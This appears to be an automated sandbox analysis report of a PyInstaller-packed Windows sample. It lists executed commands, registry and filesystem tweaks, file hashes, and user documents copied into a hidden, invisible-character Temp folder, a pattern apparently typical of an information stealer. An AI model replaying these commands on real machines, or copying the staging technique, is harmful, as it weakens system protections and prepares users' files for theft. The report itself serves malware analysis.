reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\System32\choice.exe

C:\Windows\System32\choice.exe /c:12X /n /m "  >:"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl" /v "Win32PrioritySeparation" /t REG_DWORD /d "38" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Hone" /v "MemoryTweaks" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\FTH" /v "Enabled" /t Reg_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\DWM" /v "Composition" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t Reg_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows\AppPrivacy" /v "LetAppsRunInBackground" /t Reg_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t Reg_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "DisablePagingExecutive" /t Reg_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -Command "Disable-MMAgent -PagingCombining -mc"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\Session Manager\Memory Management" /v "DisablePageCombining" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "LargeSystemCache" /t Reg_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\Session Manager" /v "HeapDeCommitFreeBlockThreshold" /t REG_DWORD /d "262144" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v "DontVerifyRandomDrivers" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v "LongPathsEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t Reg_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableSuperfetch" /t Reg_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v "HiberbootEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "HibernateEnabledDefault" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "HibernateEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v "WaitToKillAppTimeout" /t Reg_SZ /d "1000" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control" /v "WaitToKillServiceTimeout" /t Reg_SZ /d "1000" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v "HungAppTimeout" /t Reg_SZ /d "1000" /f

C:\Windows\system32\fsutil.exe

fsutil behavior set memoryusage 2

C:\Windows\system32\fsutil.exe

fsutil behavior set mftzone 2

C:\Windows\system32\fsutil.exe

fsutil behavior set disablelastaccess 1

C:\Windows\system32\fsutil.exe

fsutil behavior set encryptpagingfile 0

C:\Windows\system32\fsutil.exe

fsutil behavior set disable8dot3 1

C:\Windows\system32\fsutil.exe

fsutil behavior set disablecompression 1

C:\Windows\system32\fsutil.exe

fsutil behavior set disabledeletenotify 0

C:\Windows\system32\cmd.exe

cmd /V:ON /C @echo off

C:\Windows\system32\mode.com

Mode 65,16

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v "MouseSpeed" /t REG_SZ /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v "MouseThreshold1" /t REG_SZ /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v "MouseThreshold2" /t REG_SZ /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v "MouseSensitivity" /t REG_SZ /d "10" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve" /t REG_BINARY /d "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000" /f

C:\Windows\system32\control.exe

control.exe desk.cpl,Settings,@Settings

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL desk.cpl,Settings,@Settings

C:\Windows\explorer.exe

"C:\Windows\explorer.exe" ms-settings:display

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v "SmoothMouseXCurve" /t REG_BINARY /d "0000000000000000C0CC0C0000000000809919000000000040662600000000000033330000000000" /f

Network


Files

C:\Users\Admin\AppData\Local\Temp\_MEI22922\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

C:\Users\Admin\AppData\Local\Temp\_MEI22922\VCRUNTIME140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

memory/3632-26-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\base_library.zip

MD5 bbbf46529c77f766ef219f4c146e6ef5
SHA1 de07c922c7f4ba08bc1a62cf3fabddecc64f877e
SHA256 734e277712e823fca86ca75bf5d4f85a21893208e683c4ab407be10c3b9052dc
SHA512 3371a3a806dac2cfec59cc42937b348af67e190a8d575efc6a81ec3d8b215f8a0cb94010142f9d02c8881040a2d6b8364d124f85285d9b3b04f36226fb4fae66

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_ctypes.pyd

MD5 00f75daaa7f8a897f2a330e00fad78ac
SHA1 44aec43e5f8f1282989b14c4e3bd238c45d6e334
SHA256 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f
SHA512 f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

C:\Users\Admin\AppData\Local\Temp\_MEI22922\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

memory/3632-33-0x00007FFB5D070000-0x00007FFB5D07F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\blank.aes

MD5 52b5788c281513d74bf5f1ee6a989cb8
SHA1 379318c37380fc6a3fbd50a66940cb44b9ff61e8
SHA256 c1e49817d2969a3ecd721eecefe95b4baa4583af4eecf550df32675685b6193f
SHA512 817927309fc3904565b5c48ac5efa9869338b7a318d1523f24b14abcf33a53aa64cb6eef481c7e1f98d5f2879503fc00bdfd16aa3ba141a0c9314c186f76ff05

memory/3632-31-0x00007FFB53770000-0x00007FFB53793000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_lzma.pyd

MD5 542eab18252d569c8abef7c58d303547
SHA1 05eff580466553f4687ae43acba8db3757c08151
SHA256 d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9
SHA512 b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

memory/3632-41-0x00007FFB53570000-0x00007FFB5359D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_bz2.pyd

MD5 c413931b63def8c71374d7826fbf3ab4
SHA1 8b93087be080734db3399dc415cc5c875de857e2
SHA256 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293
SHA512 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

memory/3632-45-0x00007FFB57C30000-0x00007FFB57C49000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_sqlite3.pyd

MD5 1a8fdc36f7138edcc84ee506c5ec9b92
SHA1 e5e2da357fe50a0927300e05c26a75267429db28
SHA256 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

memory/3632-48-0x00007FFB52CE0000-0x00007FFB52D03000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\sqlite3.dll

MD5 dbc64142944210671cca9d449dab62e6
SHA1 a2a2098b04b1205ba221244be43b88d90688334c
SHA256 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c
SHA512 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

memory/3632-50-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_socket.pyd

MD5 1a34253aa7c77f9534561dc66ac5cf49
SHA1 fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256 dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512 ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

memory/3632-53-0x00007FFB535B0000-0x00007FFB535C9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\select.pyd

MD5 45d5a749e3cd3c2de26a855b582373f6
SHA1 90bb8ac4495f239c07ec2090b935628a320b31fc
SHA256 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876
SHA512 c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

memory/3632-57-0x00007FFB57A20000-0x00007FFB57A2D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_ssl.pyd

MD5 f9cc7385b4617df1ddf030f594f37323
SHA1 ebceec12e43bee669f586919a928a1fd93e23a97
SHA256 b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA512 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

C:\Users\Admin\AppData\Local\Temp\_MEI22922\libcrypto-3.dll

MD5 78ebd9cb6709d939e4e0f2a6bbb80da9
SHA1 ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA256 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512 b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

memory/3632-61-0x00007FFB4A4E0000-0x00007FFB4A513000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\libssl-3.dll

MD5 bf4a722ae2eae985bacc9d2117d90a6f
SHA1 3e29de32176d695d49c6b227ffd19b54abb521ef
SHA256 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512 dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

memory/3632-64-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp

memory/3632-67-0x00007FFB53770000-0x00007FFB53793000-memory.dmp

memory/3632-66-0x00007FFB43760000-0x00007FFB4382D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_hashlib.pyd

MD5 b227bf5d9fec25e2b36d416ccd943ca3
SHA1 4fae06f24a1b61e6594747ec934cbf06e7ec3773
SHA256 d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7
SHA512 c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

memory/3632-70-0x00007FFB52BD0000-0x00007FFB52BE4000-memory.dmp

memory/3632-74-0x00007FFB536D0000-0x00007FFB536DD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\unicodedata.pyd

MD5 8c42fcc013a1820f82667188e77be22d
SHA1 fba7e4e0f86619aaf2868cedd72149e56a5a87d4
SHA256 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2
SHA512 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

memory/3632-78-0x00007FFB43640000-0x00007FFB4375C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\bound.blank

MD5 cad54859340aaefe3491c1e3bb6ab204
SHA1 751d2dd0769585f334d7b77c0b07a8c7051f91aa
SHA256 f7c3e0c208aa535125a233c7c2ced5aba53537ed6d093464c25bc68521d5082b
SHA512 482591d9f825812e8f5a2820b1c964076be8f5ca7e04281b40742ab66037c3e34936319bea8421585a140a9bf30c2c45eb3cbc9cf48b7bbf11488159ba9aa3d7

C:\Users\Admin\AppData\Local\Temp\_MEI22922\_queue.pyd

MD5 347d6a8c2d48003301032546c140c145
SHA1 1a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256 e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512 b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

memory/3632-65-0x00007FFB43830000-0x00007FFB43D50000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_irzmcmp3.vtd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1772-88-0x000001D035BD0000-0x000001D035BF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bound.exe

MD5 927c47fb56b681f9395ba430ab47e311
SHA1 6cab388228bcb1f701fc6d3b7a256b8a259d2e26
SHA256 8f269626d102b795d411666f896b1227736815f38c0a952224db01ca2b30bf56
SHA512 b338a3138ce64d46ab608d095ef8a1358a054e5073f9d9de0c98e3f3f33e4cd843d223321d8e672b869c2171a6ee719e50e020ebff5c55e85f37cd199cac0383

memory/3632-109-0x00007FFB52CE0000-0x00007FFB52D03000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6E5A.tmp\6E5B.tmp\6E5C.bat

MD5 dac3246a897d2448c4b572f5a159cd0d
SHA1 15ff4f8282940fd6e448dcd2a1cb82ba1eab3a13
SHA256 1605c33720463f5d1fa2ca95c4904081df6caf5a26c98dab221244be293cb4bc
SHA512 907c5bab48430b9bfcff63fac115d11bb8db28fda73ed3fc5320f3b90396ef5d3d4dc39cb274c04530cc659329aa05833f668fde5b8c6d783f183346f0fa26ce

memory/3632-113-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3eb3833f769dd890afc295b977eab4b4
SHA1 e857649b037939602c72ad003e5d3698695f436f
SHA256 c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512 c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 60b3262c3163ee3d466199160b9ed07d
SHA1 994ece4ea4e61de0be2fdd580f87e3415f9e1ff6
SHA256 e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb
SHA512 081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

memory/3632-119-0x00007FFB535B0000-0x00007FFB535C9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 26c94c408a5a2e1e04f1191fc2902d3e
SHA1 ce50b153be03511bd62a477abf71a7e9f94e68a5
SHA256 86ad00a425874b935cc725f83780add09d08d7dc9cbfb705821955fe937c05ec
SHA512 70e7bc620b369d7d0fcf06f93da000819bf089a502f1014641ad14d56ead22f31c25b97363296fd3749c63bde6db3bf115b33504b160485d792e1331c337b586

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

\??\c:\Users\Admin\AppData\Local\Temp\rkt2fkxp\rkt2fkxp.cmdline

MD5 764451175596617f43b983f3b182e5d2
SHA1 55e712b30dfa54bb7be29f48c0d54d5f028db638
SHA256 9a23c3305c1a3a49f405562f4e8d1a7a7d3c3293ed99bf5112aa7cc3ddb9cc27
SHA512 731a41ea6c990617d9b00a39fdbe7aff087f87e1218504be8c095f03c4dc3ca1f5a3a22813a43ba15913f2b697cb8e9ab3efb4d07ef3cdf832e41a71dcf34bca

\??\c:\Users\Admin\AppData\Local\Temp\rkt2fkxp\rkt2fkxp.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\rkt2fkxp\CSCA56DE6D1AF5D49FCBCBCAC41BC1EE192.TMP

MD5 a1c249151a44cc17347237f473fe4f1c
SHA1 3b7ed804b77a6c71db6baad242e46f64ad507aaa
SHA256 878cad96affd0dd7fe545fc3e6e7a9620e531d58e9482998d668dc950a1dab11
SHA512 3beec7f14b06f797ab500261fbcf8ba2f7169ad1f0d384253ca9b3a42b139cfbb6f117d7baea9ecbbf8df039516ecf69e6b8a39babc3da837e9a4e927603507a

C:\Users\Admin\AppData\Local\Temp\RES7C35.tmp

MD5 91fdf5634fb49ef536cd37c68b15204a
SHA1 ce0b52f9bc70d77fc88d47a33ac2f7477d4e70d7
SHA256 a9e13ba62329d21565bae0cd8bef7d6687f1a22c31cf303ccf4c1ea7b7741cf9
SHA512 fd694659f6b20ff131ed86469638de01c0fc35046c0091f11ff678c7dc949d014efc6d62db09d18b057a244b4c8db3d08c370bc34cf76b8d6afbdc1eed5dbaf9

C:\Users\Admin\AppData\Local\Temp\rkt2fkxp\rkt2fkxp.dll

MD5 0fde815d028933727e83eb7c8336729e
SHA1 aef056e5e8cee3dfbe3c50f8ac2086713f618bd4
SHA256 29549d3b2c8a3fb13686e4d33ae83f6030028969916718117ee076b2600c8e96
SHA512 ef81435bdd352eddd5675c57f66e5cecec3ac102f6c7bbb282339788d2be6f9d8258a599cb869c1f93b4021fd70b706206b94e2e3a2c93f3d103d2d75006573b

memory/1220-183-0x0000019225140000-0x0000019225148000-memory.dmp

memory/3632-199-0x00007FFB4A4E0000-0x00007FFB4A513000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5d7b1fea485b8fe137f481fa06951a87
SHA1 260e7a8e4ed9b37a863e7e48072567a39c3c900c
SHA256 0e15bd8c72633bfea5211707f3db56a292e29431345aea123bd9f3c7e502b42f
SHA512 cb67f71e64543423f58b99451f09f8cc64e5114df7f2ed92be4eb568a8021a9ecf046e551ef22a655dea4d47b5adeb874d1be9d583030d504e918ddde7c66bb5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8e1fdd1b66d2fee9f6a052524d4ddca5
SHA1 0a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA256 4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA512 5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

memory/3632-238-0x00007FFB43830000-0x00007FFB43D50000-memory.dmp

memory/3632-239-0x00007FFB43760000-0x00007FFB4382D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI22922\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Documents\ApproveGroup.xlsx

MD5 b71ac26955cfd2794b7790778093aceb
SHA1 d45882428f419c0b440c03e7a28e8ea95c03cdd9
SHA256 a7c15b34c1afcdd4d622d301c20368fc438688b8d239dd4c714f073652c1c99e
SHA512 9d6bcea54ee0e4d0bcf0275a9623eae95bbdc1e4b1dd674405260aefcdc6f039f0bec4864bc5caf54177353d2ccb262e3a2372f51cb8cdfbfbda6d3994310df1

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Documents\CompressRedo.xlsx

MD5 77bb776232816faa93052342f21489c0
SHA1 3bd6ea44620c62eae227790d02d76005c9fd118b
SHA256 6d000723fcfcc2a9da9554841ac257e076a79d3f550a9d376f430a671a740d14
SHA512 a762011b77a28d8f611882d12a9758e8733bdf520305e517984fff276486f81615ee142450d8fd892b6890ebd432f4d34389f77d580bfef116665a626b99d1da

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Documents\PublishShow.docx

MD5 88d9cd5f0c5bf88526f8943bce0b32bd
SHA1 16d58ed6226a2fcdab3c41fe4e3d58871b05a131
SHA256 146549438b121be396fb2f18760196561a514d9407fe1a538caced8ab9a1720d
